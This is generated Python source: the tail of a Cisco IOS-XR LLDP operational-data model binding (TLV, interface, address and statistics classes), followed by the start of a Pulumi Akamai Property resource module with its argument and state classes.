super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
self.yang_name = "lldp-unknown-tlv-entry"
self.yang_parent_name = "unknown-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.tlv_type = None
self.tlv_value = None
self._segment_path = lambda: "lldp-unknown-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
self.yang_name = "org-def-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
self._leafs = OrderedDict()
self.lldp_org_def_tlv_entry = YList(self)
self._segment_path = lambda: "org-def-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList, [], name, value)
class LldpOrgDefTlvEntry(Entity):
"""
lldp org def tlv entry
.. attribute:: oui
Organizationally Unique Identifier
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_subtype
Org Def TLV subtype
**type**\: int
**range:** 0..255
.. attribute:: tlv_info_indes
lldpRemOrgDefInfoIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_value
Org Def TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
self.yang_name = "lldp-org-def-tlv-entry"
self.yang_parent_name = "org-def-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.oui = None
self.tlv_subtype = None
self.tlv_info_indes = None
self.tlv_value = None
self._segment_path = lambda: "lldp-org-def-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Interfaces(Entity):
"""
The table of interfaces on which LLDP is
running on this node
.. attribute:: interface
Operational data for an interface on which LLDP is running
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces, self).__init__()
self.yang_name = "interfaces"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface", ("interface", Lldp.Nodes.Node.Interfaces.Interface))])
self._leafs = OrderedDict()
self.interface = YList(self)
self._segment_path = lambda: "interfaces"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces, [], name, value)
class Interface(Entity):
"""
Operational data for an interface on which
LLDP is running
.. attribute:: interface_name (key)
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: local_network_addresses
Local Management Addresses
**type**\: :py:class:`LocalNetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses>`
.. attribute:: interface_name_xr
Interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: tx_enabled
TX Enabled
**type**\: int
**range:** 0..255
.. attribute:: rx_enabled
RX Enabled
**type**\: int
**range:** 0..255
.. attribute:: tx_state
TX State
**type**\: str
.. attribute:: rx_state
RX State
**type**\: str
.. attribute:: if_index
ifIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: port_id
Outgoing port identifier
**type**\: str
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_description
Port Description
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([("local-network-addresses", ("local_network_addresses", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface_name_xr', (YLeaf(YType.str, 'interface-name-xr'), ['str'])),
('tx_enabled', (YLeaf(YType.uint8, 'tx-enabled'), ['int'])),
('rx_enabled', (YLeaf(YType.uint8, 'rx-enabled'), ['int'])),
('tx_state', (YLeaf(YType.str, 'tx-state'), ['str'])),
('rx_state', (YLeaf(YType.str, 'rx-state'), ['str'])),
('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
('port_id', (YLeaf(YType.str, 'port-id'), ['str'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
])
self.interface_name = None
self.interface_name_xr = None
self.tx_enabled = None
self.rx_enabled = None
self.tx_state = None
self.rx_state = None
self.if_index = None
self.port_id = None
self.port_id_sub_type = None
self.port_description = None
self.local_network_addresses = Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses()
self.local_network_addresses.parent = self
self._children_name_map["local_network_addresses"] = "local-network-addresses"
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface, ['interface_name', 'interface_name_xr', 'tx_enabled', 'rx_enabled', 'tx_state', 'rx_state', 'if_index', 'port_id', 'port_id_sub_type', 'port_description'], name, value)
class LocalNetworkAddresses(Entity):
"""
Local Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses, self).__init__()
self.yang_name = "local-network-addresses"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "local-network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "local-network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Interfaces.Interface.LocalNetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Statistics(Entity):
"""
The LLDP traffic statistics for this node
.. attribute:: transmitted_packets
Transmitted packets
**type**\: int
**range:** 0..4294967295
.. attribute:: aged_out_entries
Aged out entries
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_packets
Discarded packets
**type**\: int
**range:** 0..4294967295
.. attribute:: bad_packets
Bad packet received and dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: received_packets
Received packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_tl_vs
Discarded TLVs
**type**\: int
**range:** 0..4294967295
.. attribute:: unrecognized_tl_vs
Unrecognized TLVs
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_memory_errors
Out\-of\-memory conditions
**type**\: int
**range:** 0..4294967295
.. attribute:: encapsulation_errors
Transmission errors
**type**\: int
**range:** 0..4294967295
.. attribute:: queue_overflow_errors
Queue overflows
**type**\: int
**range:** 0..4294967295
.. attribute:: table_overflow_errors
Table overflows
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "node"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('transmitted_packets', (YLeaf(YType.uint32, 'transmitted-packets'), ['int'])),
('aged_out_entries', (YLeaf(YType.uint32, 'aged-out-entries'), ['int'])),
('discarded_packets', (YLeaf(YType.uint32, 'discarded-packets'), ['int'])),
('bad_packets', (YLeaf(YType.uint32, 'bad-packets'), ['int'])),
('received_packets', (YLeaf(YType.uint32, 'received-packets'), ['int'])),
('discarded_tl_vs', (YLeaf(YType.uint32, 'discarded-tl-vs'), ['int'])),
('unrecognized_tl_vs', (YLeaf(YType.uint32, 'unrecognized-tl-vs'), ['int'])),
('out_of_memory_errors', (YLeaf(YType.uint32, 'out-of-memory-errors'), ['int'])),
('encapsulation_errors', (YLeaf(YType.uint32, 'encapsulation-errors'), ['int'])),
('queue_overflow_errors', (YLeaf(YType.uint32, 'queue-overflow-errors'), ['int'])),
('table_overflow_errors', (YLeaf(YType.uint32, 'table-overflow-errors'), ['int'])),
])
self.transmitted_packets = None
self.aged_out_entries = None
self.discarded_packets = None
self.bad_packets = None
self.received_packets = None
self.discarded_tl_vs = None
self.unrecognized_tl_vs = None
self.out_of_memory_errors = None
self.encapsulation_errors = None
self.queue_overflow_errors = None
self.table_overflow_errors = None
self._segment_path = lambda: "statistics"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Statistics, ['transmitted_packets', 'aged_out_entries', 'discarded_packets', 'bad_packets', 'received_packets', 'discarded_tl_vs', 'unrecognized_tl_vs', 'out_of_memory_errors', 'encapsulation_errors', 'queue_overflow_errors', 'table_overflow_errors'], name, value)
def clone_ptr(self):
self._top_entity = Lldp()
return self._top_entity
| 54.714012 | 376 | 0.37557 | 11,890 | 171,036 | 5.132885 | 0.023802 | 0.030673 | 0.043028 | 0.061281 | 0.920334 | 0.903703 | 0.878601 | 0.865853 | 0.856022 | 0.851696 | 0 | 0.021384 | 0.535466 | 171,036 | 3,125 | 377 | 54.73152 | 0.746753 | 0.180143 | 0 | 0.753859 | 0 | 0 | 0.121866 | 0.024187 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078798 | false | 0 | 0.004062 | 0 | 0.126726 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1c1d45b6715982b34a08cb5a4d252b6b356100d3 | 42,305 | py | Python | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2021-01-21T15:22:12.000Z | 2021-08-25T14:15:29.000Z | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | 59 | 2020-08-13T14:39:36.000Z | 2022-03-31T15:19:48.000Z | sdk/python/pulumi_akamai/properties/property.py | pulumi/pulumi-akamai | 85f933ccf2f61738b3074a13fa718132280f8364 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PropertyArgs', 'Property']
@pulumi.input_type
class PropertyArgs:
def __init__(__self__, *,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]] = None,
rules: Optional[pulumi.Input[str]] = None,
variables: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Property resource.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
"""
if contacts is not None:
warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
if contacts is not None:
pulumi.set(__self__, "contacts", contacts)
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if cp_code is not None:
warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
if cp_code is not None:
pulumi.set(__self__, "cp_code", cp_code)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if hostnames is not None:
pulumi.set(__self__, "hostnames", hostnames)
if is_secure is not None:
warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
if is_secure is not None:
pulumi.set(__self__, "is_secure", is_secure)
if name is not None:
pulumi.set(__self__, "name", name)
if origins is not None:
warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
if origins is not None:
pulumi.set(__self__, "origins", origins)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
if rule_format is not None:
pulumi.set(__self__, "rule_format", rule_format)
if rule_warnings is not None:
warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
if rule_warnings is not None:
pulumi.set(__self__, "rule_warnings", rule_warnings)
if rules is not None:
pulumi.set(__self__, "rules", rules)
if variables is not None:
warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
if variables is not None:
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
def contacts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "contacts")
@contacts.setter
def contacts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "contacts", value)
@property
@pulumi.getter
def contract(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "contract")
@contract.setter
def contract(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract", value)
@property
@pulumi.getter(name="contractId")
def contract_id(self) -> Optional[pulumi.Input[str]]:
"""
Contract ID to be assigned to the Property
"""
return pulumi.get(self, "contract_id")
@contract_id.setter
def contract_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "contract_id", value)
@property
@pulumi.getter(name="cpCode")
def cp_code(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cp_code")
@cp_code.setter
def cp_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cp_code", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
"""
Group ID to be assigned to the Property
"""
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def hostnames(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]:
return pulumi.get(self, "hostnames")
@hostnames.setter
def hostnames(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]]):
pulumi.set(self, "hostnames", value)
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "is_secure")
@is_secure.setter
def is_secure(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_secure", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name to give to the Property (must be unique)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def origins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]:
return pulumi.get(self, "origins")
@origins.setter
def origins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]]):
pulumi.set(self, "origins", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="productId")
def product_id(self) -> Optional[pulumi.Input[str]]:
"""
Product ID to be assigned to the Property
"""
return pulumi.get(self, "product_id")
@product_id.setter
def product_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product_id", value)
@property
@pulumi.getter(name="ruleFormat")
def rule_format(self) -> Optional[pulumi.Input[str]]:
"""
Specify the rule format version (defaults to latest version available when created)
"""
return pulumi.get(self, "rule_format")
@rule_format.setter
def rule_format(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_format", value)
@property
@pulumi.getter(name="ruleWarnings")
def rule_warnings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]:
return pulumi.get(self, "rule_warnings")
@rule_warnings.setter
def rule_warnings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]]):
pulumi.set(self, "rule_warnings", value)
@property
@pulumi.getter
def rules(self) -> Optional[pulumi.Input[str]]:
"""
Property Rules as JSON
"""
return pulumi.get(self, "rules")
@rules.setter
def rules(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rules", value)
@property
@pulumi.getter
def variables(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "variables")
@variables.setter
def variables(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "variables", value)
@pulumi.input_type
class _PropertyState:
def __init__(__self__, *,
contacts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
contract: Optional[pulumi.Input[str]] = None,
contract_id: Optional[pulumi.Input[str]] = None,
cp_code: Optional[pulumi.Input[str]] = None,
group: Optional[pulumi.Input[str]] = None,
group_id: Optional[pulumi.Input[str]] = None,
hostnames: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyHostnameArgs']]]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
latest_version: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
origins: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyOriginArgs']]]] = None,
product: Optional[pulumi.Input[str]] = None,
product_id: Optional[pulumi.Input[str]] = None,
production_version: Optional[pulumi.Input[int]] = None,
read_version: Optional[pulumi.Input[int]] = None,
rule_errors: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleErrorArgs']]]] = None,
rule_format: Optional[pulumi.Input[str]] = None,
rule_warnings: Optional[pulumi.Input[Sequence[pulumi.Input['PropertyRuleWarningArgs']]]] = None,
rules: Optional[pulumi.Input[str]] = None,
staging_version: Optional[pulumi.Input[int]] = None,
variables: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Property resources.
:param pulumi.Input[str] contract_id: Contract ID to be assigned to the Property
:param pulumi.Input[str] group_id: Group ID to be assigned to the Property
:param pulumi.Input[int] latest_version: Property's current latest version number
:param pulumi.Input[str] name: Name to give to the Property (must be unique)
:param pulumi.Input[str] product_id: Product ID to be assigned to the Property
:param pulumi.Input[int] production_version: Property's version currently activated in production (zero when not active in production)
:param pulumi.Input[int] read_version: Required property's version to be read
:param pulumi.Input[str] rule_format: Specify the rule format version (defaults to latest version available when created)
:param pulumi.Input[str] rules: Property Rules as JSON
:param pulumi.Input[int] staging_version: Property's version currently activated in staging (zero when not active in staging)
"""
if contacts is not None:
warnings.warn("""The setting \"contact\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contacts is deprecated: The setting \"contact\" has been deprecated.""")
if contacts is not None:
pulumi.set(__self__, "contacts", contacts)
if contract is not None:
warnings.warn("""The setting \"contract\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""contract is deprecated: The setting \"contract\" has been deprecated.""")
if contract is not None:
pulumi.set(__self__, "contract", contract)
if contract_id is not None:
pulumi.set(__self__, "contract_id", contract_id)
if cp_code is not None:
warnings.warn("""The setting \"cp_code\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""cp_code is deprecated: The setting \"cp_code\" has been deprecated.""")
if cp_code is not None:
pulumi.set(__self__, "cp_code", cp_code)
if group is not None:
warnings.warn("""The setting \"group\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""group is deprecated: The setting \"group\" has been deprecated.""")
if group is not None:
pulumi.set(__self__, "group", group)
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if hostnames is not None:
pulumi.set(__self__, "hostnames", hostnames)
if is_secure is not None:
warnings.warn("""The setting \"is_secure\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""is_secure is deprecated: The setting \"is_secure\" has been deprecated.""")
if is_secure is not None:
pulumi.set(__self__, "is_secure", is_secure)
if latest_version is not None:
pulumi.set(__self__, "latest_version", latest_version)
if name is not None:
pulumi.set(__self__, "name", name)
if origins is not None:
warnings.warn("""The setting \"origin\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""origins is deprecated: The setting \"origin\" has been deprecated.""")
if origins is not None:
pulumi.set(__self__, "origins", origins)
if product is not None:
warnings.warn("""The setting \"product\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""product is deprecated: The setting \"product\" has been deprecated.""")
if product is not None:
pulumi.set(__self__, "product", product)
if product_id is not None:
pulumi.set(__self__, "product_id", product_id)
if production_version is not None:
pulumi.set(__self__, "production_version", production_version)
if read_version is not None:
pulumi.set(__self__, "read_version", read_version)
if rule_errors is not None:
pulumi.set(__self__, "rule_errors", rule_errors)
if rule_format is not None:
pulumi.set(__self__, "rule_format", rule_format)
if rule_warnings is not None:
warnings.warn("""Rule warnings will not be set in state anymore""", DeprecationWarning)
pulumi.log.warn("""rule_warnings is deprecated: Rule warnings will not be set in state anymore""")
if rule_warnings is not None:
pulumi.set(__self__, "rule_warnings", rule_warnings)
if rules is not None:
pulumi.set(__self__, "rules", rules)
if staging_version is not None:
pulumi.set(__self__, "staging_version", staging_version)
if variables is not None:
warnings.warn("""The setting \"variables\" has been deprecated.""", DeprecationWarning)
pulumi.log.warn("""variables is deprecated: The setting \"variables\" has been deprecated.""")
if variables is not None:
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
